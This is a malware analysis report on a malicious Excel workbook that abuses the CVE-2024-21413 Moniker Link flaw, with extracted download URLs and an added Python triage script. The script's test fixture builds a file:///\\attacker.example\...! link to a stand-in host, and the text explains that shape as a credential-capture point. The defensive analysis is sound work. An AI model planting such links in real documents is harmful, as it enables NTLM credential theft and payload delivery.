Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 91e2439fa1ef2687…

MALICIOUS

Office (OOXML) / .XLSX

Size: 487.8 KB
Created: 2018-12-18 10:38:50 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2024-07-31
MD5: ee2ee20077808e4a43042d42661bc67d
SHA-1: 717a01b3e0a45132fcb4ecc3fc226139479183a5
SHA-256: 91e2439fa1ef2687833c9aa9eeb6dc26adef962eabad9742e69150036a219ac8
Risk score: 82

Malware Insights

MITRE ATT&CK
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment (the report listed T1566.002, which is Spearphishing Link; the attachment sub-technique is .001)

The critical heuristic for CVE-2024-21413 fired on a hyperlink in the Moniker Link shape (a file:///\\...! UNC target), so the document appears built to abuse that vulnerability rather than to carry a macro. Among the extracted link targets is an Excel file on another host (http://notespol06/WINDOWS/TEMP/Apo.xls), which points to downloader or dropper behaviour: the lure fetches a second workbook instead of embedding the payload. The external workbook relationship and the embedded URLs are consistent with that delivery chain but are not detections on their own; confirm by inspecting the relationship targets under xl/worksheets/_rels/ and xl/externalLinks/_rels/ before acting on the verdict.

Heuristics (3)

  • CVE-2024-21413 — Moniker Link UNC path in OOXML (severity: critical; category: CVE; confidence: likely; rule: CVE_2024_21413)
    Document contains a file:///\\...! hyperlink matching the Moniker Link shape associated with CVE-2024-21413. In affected Office/Outlook paths this can bypass Protected View and trigger NTLM authentication.
  • External relationship (severity: medium; rule: OOXML_EXTERNAL_REL)
    External target in xl/externalLinks/_rels/externalLink1.xml.rels: /PRZETARGI/OBwodnica Nowa Sól2/Documents and Settings/Jarek/Ustawienia lokalne/Temporary Internet Files/Content.IE5/MTJW
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://stranet.strabag.com/Moje
    • http://notespol06/WINDOWS/TEMP/Apo.xls
    • https://budimex-my.sharepoint.com/ARCHIVIO
    • https://budimex-my.sharepoint.com/Tematy_2012/KCO/notesCDEF00/notesCDEF00/Documents
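The three heuristics above all key on relationship targets inside the OOXML package: the Moniker Link shape is a hyperlink relationship whose Target is file:///\\host\share\...!, the external relationship lives in xl/externalLinks/_rels/, and the embedded URLs are http(s) targets. The script below is an added example of how an analyst reproduces that triage offline; it is not the scanner that produced this report and not the sample file, which is not available here. It builds a constructed, minimal .xlsx-like ZIP in memory (the hostnames, share names and paths in it are invented for illustration), walks every *.rels part, classifies each Target with the same critical/medium/info tiers the report uses, and returns the findings so they can be checked rather than only printed.

```python
"""Triage OOXML relationship targets for the Moniker Link (CVE-2024-21413) shape,
external workbook links and embedded URLs.

Added example, not part of the original report or its scanner. The sample package
built by build_sample_xlsx() is constructed; every host, share and path in it is
invented.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = f"{{{RELS_NS}}}Relationship"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
EXTLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLinkPath"

# Moniker Link shape: file:///\\host\share\path!  (two or three slashes, a UNC host,
# a path, then "!"). The trailing "!" is what matters: it makes Outlook/Office parse
# the target as a composite moniker instead of a plain file hyperlink.
MONIKER_RE = re.compile(r"^file:/{2,3}\\\\[^\\]+\\.+!", re.IGNORECASE)


def classify_target(part: str, target: str, mode: str) -> Optional[str]:
    """Map one relationship Target to a label; None means not worth listing
    (internal package parts, relative paths, mailto: and similar)."""
    if MONIKER_RE.match(target):
        return "moniker_link"      # critical: CVE-2024-21413 shape
    if part.startswith("xl/externalLinks/_rels/"):
        return "external_rel"      # medium: external workbook link target
    if target.lower().startswith("file:"):
        return "file_link"         # file:/UNC hyperlink without the "!" (still an NTLM risk on click)
    if mode == "External" and target.lower().startswith(("http://", "https://")):
        return "url"               # info: a URL is not a detection by itself
    return None


def scan_ooxml(data: bytes) -> List[Dict[str, str]]:
    """Walk every *.rels part of an OOXML ZIP and classify its relationship targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_TAG):
                target = rel.get("Target", "")
                mode = rel.get("TargetMode", "Internal")
                kind = classify_target(name, target, mode)
                if kind:
                    findings.append({"part": name, "kind": kind, "target": target})
    return findings


def triage(findings: List[Dict[str, str]]) -> str:
    """Collapse findings to the highest tier, mirroring the report's severities."""
    kinds = {f["kind"] for f in findings}
    if "moniker_link" in kinds:
        return "critical"
    if kinds & {"external_rel", "file_link"}:
        return "medium"
    if "url" in kinds:
        return "info"
    return "clean"


def build_sample_xlsx() -> bytes:
    """Constructed minimal package containing only the parts the scan inspects."""
    sheet_rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{HYPERLINK_TYPE}" '
        r'Target="file:///\\attacker.example\share\lure.xlsx!" TargetMode="External"/>'   # invented host
        f'<Relationship Id="rId2" Type="{HYPERLINK_TYPE}" '
        'Target="http://intranet.example/WINDOWS/TEMP/Apo.xls" TargetMode="External"/>'  # invented host
        "</Relationships>"
    )
    ext_rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{EXTLINK_TYPE}" '
        'Target="/PROJECTS/Bypass2/Documents and Settings/user/Local Settings/Temporary Internet Files/Content.IE5/ABCD" '
        'TargetMode="External"/></Relationships>'   # invented path
    )
    workbook_rels = (
        f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" '
        'Target="worksheets/sheet1.xml"/></Relationships>'   # internal part: must be ignored
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/_rels/workbook.xml.rels", workbook_rels)
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels)
        zf.writestr("xl/externalLinks/_rels/externalLink1.xml.rels", ext_rels)
    return buf.getvalue()


if __name__ == "__main__":
    found = scan_ooxml(build_sample_xlsx())   # for a real file: scan_ooxml(open(path, "rb").read())
    for f in found:
        print(f"{f['kind']:13} {f['part']}: {f['target']}")
    print("verdict:", triage(found))
```

On the constructed sample the verdict is "critical" because of the file:///\\...! target; the http target and the externalLinks path are listed at their lower tiers. Because the report elides the actual Moniker Link target ("file:///\\...!"), the first thing to do with the real sample is run the scan over it and read the full Target string: a UNC host you control is the credential-capture or payload-staging point, and the "!" suffix is what separates the CVE-2024-21413 shape from an ordinary file: hyperlink, which this script reports separately as file_link.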